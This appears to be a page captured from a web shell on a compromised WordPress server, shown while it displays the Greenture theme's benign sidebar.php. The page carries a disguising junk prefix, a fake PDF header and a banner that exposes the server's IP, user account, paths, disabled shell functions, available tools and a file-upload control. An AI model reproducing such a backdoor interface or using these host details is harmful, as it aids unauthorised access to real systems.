...........................................................................................................................................................................................................................................................................................................................@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@%PDF-1.5 MRK IS HERE %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
| Server IP : 65.108.66.160 / Your IP : 216.73.217.50 Web Server : Apache System : Linux srv16.asso.com.ar 4.18.0-553.123.1.el8_10.x86_64 #1 SMP Tue May 5 04:00:43 EDT 2026 x86_64 User : alasaweborg ( 1047) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/alasaweborg/public_html/wp-content/themes/greenture/ |
Upload File : |
<?php
/**
* The Sidebar containing the main widget areas.
*
* @package greenture
*/
$sidebar_widget = $layout = $home_id = '';
if( is_singular() ) {
$layout = get_post_meta( $post->ID, 'greenture_layout', true );
$sidebar_widget = get_post_meta( $post->ID, 'greenture_primary_sidebar', true );
}
if( is_archive() ) {
$layout = greenture_get_option( 'blog_archive_layout' );
}
if( is_home() ) {
$home_id = get_option( 'page_for_posts' );
$layout = get_post_meta( $home_id, 'greenture_layout', true );
if( !$layout ) {
$layout = greenture_get_option( 'blog_layout' );
}
$sidebar_widget = get_post_meta( $home_id, 'greenture_primary_sidebar', true );
}
if( is_singular('greenture_portfolio') ) {
$layout = greenture_get_option( 'layout' );
}
if ( is_singular( 'post' ) ) {
$layout = get_post_meta( $post->ID, 'greenture_layout', true );
if( !$layout ) {
$layout = greenture_get_option( 'single_post_layout' );
}
$sidebar_widget = get_post_meta( $post->ID, 'greenture_primary_sidebar', true );
}
if( !$layout ) {
if( greenture_get_option( 'layout' ) != '' ) {
$layout = greenture_get_option( 'layout' );
}
else {
$layout = 'one-col';
}
}
if( is_singular() ) {
$sidebar_widget = get_post_meta( $post->ID, 'greenture_primary_sidebar', true );
}
if( $sidebar_widget == '' || $sidebar_widget == '0' ) {
$sidebar_widget = 'primary';
}
if( $layout != 'one-col' ) {
if ( is_active_sidebar( $sidebar_widget ) ) {
?>
<div id="sidebar" class="primary-sidebar sidebar pm-sidebar">
<?php dynamic_sidebar( $sidebar_widget ); ?>
</div><!-- #sidebar -->
<?php } // End Active Sidebar IF Statement
} // End Layout IF Statement
?>